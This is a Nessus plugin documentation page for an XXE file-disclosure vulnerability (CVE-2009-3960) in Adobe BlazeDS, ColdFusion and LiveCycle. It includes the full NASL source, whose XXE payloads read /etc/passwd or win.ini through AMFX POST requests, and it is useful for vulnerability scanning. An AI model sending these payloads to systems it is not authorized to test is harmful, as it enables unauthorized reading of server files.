Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05) - Nessus
Medium Plugin ID: 44937This page contains detailed information about the Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05) Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.
Plugin Overview
ID: 44937
Name: Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)
Filename: adobe_multiple_products_xxe.nasl
Vulnerability Published: 2010-02-11
This Plugin Published: 2010-03-01
Last Modification Time: 2022-04-11
Plugin Version: 1.27
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies:
http_version.nasl, os_fingerprint.nasl
Vulnerability Information
Severity: Medium
Vulnerability Published: 2010-02-11
Patch Published: 2010-02-11
CVE [?]: CVE-2009-3960
CPE [?]: cpe:/a:adobe:blazeds, cpe:/a:adobe:coldfusion, cpe:/a:adobe:flex_data_services, cpe:/a:adobe:lifecycle, cpe:/a:adobe:lifecycle_data_services
Synopsis
The remote host is susceptible to XML External Entity (XXE) attacks.
Description
The remote host appears to be running an Adobe product that is susceptible to XML External Entity (XXE) attacks. The installed version of the product fails to block the use of external XML entities while using the HTTPChannel to transport data in AMFX format. A remote, unauthenticated attacker could exploit this vulnerability to read arbitrary files from the remote system.
According to the Adobe advisory, Adobe BlazeDS, LiveCycle, LiveCycle Data Services, Flex Data Services and ColdFusion are known to be affected by this issue.
Solution
Apply the appropriate vendor-supplied patches.
Public Exploits
Target Network Port(s): 80, 8400, 8500
Target Asset(s): Services/www
Exploit Available: True (Exploit-DB, Immunity Canvas, D2 Elliot)
Exploit Ease: Exploits are available
Here's the list of publicly known exploits and PoCs for verifying the Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05) vulnerability:
- Exploit-DB: exploits/multiple/dos/11529.txt
[EDB-11529: Adobe (Multiple Products) - XML External Entity / XML Injection] - D2 Elliot: adobe_xml_external_entity_file_disclosure.html
[Adobe XML External Entity File Disclosure] - Immunity Canvas: D2ExploitPack
Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.
WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.
Risk Information
CVSS Score Source [?]: CVE-2009-3960
CVSS V2 Vector: AV:N/AC:M/Au:N/C:P/I:N/A:N/E:H/RL:OF/RC:C
| CVSS Base Score: | 4.3 (Medium) |
| Impact Subscore: | 2.9 |
| Exploitability Subscore: | 8.6 |
| CVSS Temporal Score: | 3.7 (Low) |
| CVSS Environmental Score: | NA (None) |
| Modified Impact Subscore: | NA |
| Overall CVSS Score: | 3.7 (Low) |
Go back to menu.
Plugin Source
This is the adobe_multiple_products_xxe.nasl nessus plugin source code. This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(44937);
script_version("1.27");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2009-3960");
script_bugtraq_id(38197);
script_xref(name:"EDB-ID", value:"11529");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/09/07");
script_xref(name:"SECUNIA", value:"38543");
script_name(english:"Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)");
script_set_attribute(attribute:"synopsis", value:
"The remote host is susceptible to XML External Entity (XXE)
attacks.");
script_set_attribute(attribute:"description", value:
"The remote host appears to be running an Adobe product that is
susceptible to XML External Entity (XXE) attacks. The installed
version of the product fails to block the use of external XML entities
while using the HTTPChannel to transport data in AMFX format. A
remote, unauthenticated attacker could exploit this vulnerability to
read arbitrary files from the remote system.
According to the Adobe advisory, Adobe BlazeDS, LiveCycle, LiveCycle
Data Services, Flex Data Services and ColdFusion are known to be
affected by this issue.");
# http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?6688a1e2");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2010/Feb/197");
script_set_attribute(attribute:"see_also", value:"https://www.adobe.com/support/security/bulletins/apsb10-05.html");
script_set_attribute(attribute:"solution", value:
"Apply the appropriate vendor-supplied patches.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2009-3960");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"Adobe XML External Entity File Disclosure");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"D2ExploitPack");
script_set_attribute(attribute:"vuln_publication_date", value:"2010/02/11");
script_set_attribute(attribute:"patch_publication_date", value:"2010/02/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2010/03/01");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:lifecycle");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:lifecycle_data_services");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:flex_data_services");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:coldfusion");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:blazeds");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2010-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl", "os_fingerprint.nasl");
script_require_ports("Services/www", 80, 8400, 8500);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");
port = get_http_port(default:80);
# Make a list of known HTTPChannel endpoints.
# Check for sample apps only if thorough_tests
# are enabled
if(thorough_tests)
{
if (get_port_transport(port) > ENCAPS_IP)
{
urls = make_list(
"/flex2gateway/http", # ColdFusion 9 (disabled by default)
"/flex2gateway/httpsecure", # ColdFusion 9 (disabled by default)
"/messagebroker/http",
"/messagebroker/httpsecure",
"/blazeds/messagebroker/http", # Blazeds 3.2
"/blazeds/messagebroker/httpsecure", #
"/samples/messagebroker/http", # Blazeds 3.2
"/samples/messagebroker/httpsecure", # Blazeds 3.2
"/lcds/messagebroker/http", # LCDS
"/lcds/messagebroker/httpsecure", # LCDS
"/lcds-samples/messagebroker/http", # LCDS
"/lcds-samples/messagebroker/httpsecure"); # LCDS
}
else
{
urls = make_list(
"/flex2gateway/http", # ColdFusion 9 (disabled by default)
"/messagebroker/http",
"/blazeds/messagebroker/http", # Blazeds 3.2
"/samples/messagebroker/http", # Blazeds 3.2
"/lcds/messagebroker/http", # LCDS
"/lcds-samples/messagebroker/http"); # LCDS
}
}
else
{
if (get_port_transport(port) > ENCAPS_IP)
{
# nb : Both endpoints (http/httpsecure) are vulnerable on
# encrypted ports.
urls = make_list(
"/flex2gateway/http", # ColdFusion 9 (disabled by default)
"/flex2gateway/httpsecure", # ColdFusion 9 (disabled by default)
"/messagebroker/http",
"/messagebroker/httpsecure", # Blazeds 3.2
"/blazeds/messagebroker/http", # Blazeds 3.2
"/blazeds/messagebroker/httpsecure",
"/lcds/messagebroker/http", # LCDS
"/lcds/messagebroker/httpsecure"); # LCDS
}
else
{
urls = make_list(
"/flex2gateway/http", # ColdFusion 9 (disabled by default)
"/messagebroker/http",
"/blazeds/messagebroker/http", # Blazeds 3.2
"/lcds/messagebroker/http"); # LCDS
}
}
os = get_kb_item("Host/OS");
if (os)
{
if ("Windows" >< os) injections = make_list(
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\windows\\win.ini"> ]>',
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\winnt\\win.ini"> ]>');
else injections = make_list(
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "/etc/passwd"> ]>');
}
else injections = make_list(
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\windows\\win.ini"> ]>',
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\winnt\\win.ini"> ]>',
'<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "/etc/passwd"> ]>');
injection_pats = make_array();
injection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\windows\\win.ini"> ]>'] = "\[[a-zA-Z\s]+\]|; for 16-bit app support";
injection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "c:\\winnt\\win.ini"> ]>'] = "\[[a-zA-Z\s]+\]|; for 16-bit app support";
injection_pats['<!DOCTYPE foo [ <!ENTITY nessus SYSTEM "/etc/passwd"> ]>'] = "root:.*:0:[01]:";
info = NULL;
foreach injection (injections)
{
foreach url (urls)
{
exploit = '<?xml version="1.0" encoding="utf-8"?>' + '\n' +
injection + '\n' +
'<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">' + '\n' +
' <body>' + '\n' +
' <object type="flex.messaging.messages.CommandMessage">' + '\n' +
' <traits>' + '\n' +
' <string>body</string><string>clientId</string><string>correlationId</string>' + '\n' +
' <string>destination</string><string>headers</string><string>messageId</string>' + '\n' +
' <string>operation</string><string>timestamp</string><string>timeToLive</string>' + '\n' +
' </traits><object><traits />' + '\n' +
' </object>' + '\n' +
' <null /><string /><string />' + '\n' +
' <object>' + '\n' +
' <traits>' + '\n' +
' <string>DSId</string><string>DSMessagingVersion</string>' + '\n' +
' </traits>' + '\n' +
' <string>nil</string><int>1</int>' + '\n' +
' </object>' + '\n' +
' <string>&nessus;</string>' + '\n' +
'<int>5</int><int>0</int><int>0</int>' + '\n' +
' </object>' + '\n' +
' </body>' + '\n' +
'</amfx>';
res = http_send_recv3(
method:"POST",
item:url,
port:port,
add_headers: make_array("Content-Type", "application/x-amf"),
data:exploit,
exit_on_fail:TRUE);
match = egrep(pattern:injection_pats[injection], string:res[2]);
if (
res[2] &&
"<amfx" >< res[2] &&
(!empty_or_null(match))
)
{
req = http_last_sent_request();
output = NULL;
if ("win.ini" >< injection)
{
file = "win.ini";
}
else file = "/etc/passwd";
# Format output
pos = stridx(match, "null/><string>");
if (pos > 0 && !empty_or_null(pos))
{
output = substr(match, pos);
output = output - "null/><string>";
}
# Should never reach this, but just in case
if (empty_or_null(output))
output = extract_pattern_from_resp(string:res[2], pattern:'RE:'+injection_pats[injection]);
output = data_protection::redact_etc_passwd(output:output);
info += '\n' + 'HTTPChannel Endpoint : ' + url + '\n';
snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
info += '\n' +
'Nessus was able to exploit the issue to retrieve the contents of ' +
'\n' + "'" + file + "'" + ' using the following request :' +
'\n\n' +req +'\n\n' +
'This produced the following truncated output (limited to 10 lines) :' +
'\n' + snip +
'\n' + beginning_of_response2(resp:output, max_lines:10) +
'\n' + snip +
'\n';
}
if (!isnull(info)) break;
}
if (!isnull(info)) break;
}
if (!isnull(info))
{
if (report_verbosity > 0)
{
report = '\n' +
"Nessus found following vulnerable HTTPChannel endpoint : " + '\n' +
info + '\n';
security_warning(port:port, extra:report);
}
else
security_warning(port);
}
else exit(0, 'Nessus did not identify any affected endpoints on the webserver listening on port '+ port);
The latest version of this script can be found in these locations depending on your platform:
- Linux / Unix:
/opt/nessus/lib/nessus/plugins/adobe_multiple_products_xxe.nasl - Windows:
C:\ProgramData\Tenable\Nessus\nessus\plugins\adobe_multiple_products_xxe.nasl - Mac OS X:
/Library/Nessus/run/lib/nessus/plugins/adobe_multiple_products_xxe.nasl
Go back to menu.
How to Run
Here is how to run the Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05) as a standalone plugin via the Nessus web user interface (https://localhost:8834/):
- Click to start a New Scan.
- Select Advanced Scan.
- Navigate to the Plugins tab.
- On the top right corner click to Disable All plugins.
- On the left side table select CGI abuses plugin family.
- On the right side table select Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05) plugin ID 44937.
- Specify the target on the Settings tab and click to Save the scan.
- Run the scan.
Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.
Basic usage:
/opt/nessus/bin/nasl adobe_multiple_products_xxe.nasl -t <IP/HOST>Run the plugin with audit trail message on the console:
/opt/nessus/bin/nasl -a adobe_multiple_products_xxe.nasl -t <IP/HOST>Run the plugin with trace script execution written to the console (useful for debugging):
/opt/nessus/bin/nasl -T - adobe_multiple_products_xxe.nasl -t <IP/HOST>Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):
/opt/nessus/bin/nasl -K /tmp/state adobe_multiple_products_xxe.nasl -t <IP/HOST>Go back to menu.
References
BID | SecurityFocus Bugtraq ID: Secunia Advisory: See also:
- https://www.tenable.com/plugins/nessus/44937
- https://seclists.org/bugtraq/2010/Feb/197
- https://www.adobe.com/support/security/bulletins/apsb10-05.html
- http://www.nessus.org/u?6688a1e2
- https://vulners.com/nessus/ADOBE_MULTIPLE_PRODUCTS_XXE.NASL
- 65127 - Adobe InDesign Server RunScript Arbitrary Command Execution
- 11748 - Multiple Dangerous CGI Script Detection
- 10176 - Multiple Vendor phf CGI Arbitrary Command Execution
- 10282 - Multiple Vendor test-cgi Arbitrary File Access
- 80475 - Multiple Slider Plugins for WordPress 'img' Parameter Local File Inclusion Vulnerability
- 49217 - Multiple Switch Vendors '__super' Account Backdoor
- 49003 - Multiple Vulnerabilities in the IOS FTP Server
- 49017 - Multiple Cisco Products Vulnerable to DNS Cache Poisoning Attacks
- 139545 - Multiple Vulnerabilities in Treck IP Stack Affecting Cisco Products: June 2020 (cisco-sa-treck-ip-stack-JyBQ5GyC)
- 33447 - Multiple Vendor DNS Query ID Field Prediction Cache Poisoning
- 11197 - Multiple Ethernet Driver Frame Padding Information Disclosure (Etherleak)
- 10821 - Multiple FTPD glob Command Arbitrary Command Execution
- 10084 - Multiple FTP Server Command Handling Overflow
- 123520 - Multiple Command Injection Vulnerabilities in Grandstream Products
- 124173 - Multiple Command Injection Vulnerabilities in Grandstream Products
- 10930 - Multiple Web Server on Windows MS/DOS Device Request Remote DOS
- 11337 - Multiple Linux rpc.mountd Remote Overflow
- 10249 - Multiple Mail Server EXPN/VRFY Information Disclosure
- 40449 - Multiple Vendor HMAC Authentication SNMPv3 Authentication Bypass
- 11136 - Multiple OS /bin/login Remote Overflow
- 31683 - Multiple Vendor NIS rpc.ypupdated YP Map Update Arbitrary Remote Command Execution
- 66526 - Adobe ColdFusion Multiple Vulnerabilities (APSB13-03) (credentialed check)
- 126620 - Atlassian JIRA Server & JIRA Data Center Template Injection Vulnerability
- 128762 - Atlassian JIRA Server Template Injection Vulnerability (CVE-2019-11581)
- 95823 - NETGEAR Multiple Model cgi-bin RCE
- 139225 - Pulse Connect Secure < 9.1R8 (SA44516)
- 139226 - Pulse Policy Secure < 9.1R8 (SA44516)
Version
This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file adobe_multiple_products_xxe.nasl version 1.27. For more plugins, visit the Nessus Plugin Library.
Go back to menu.
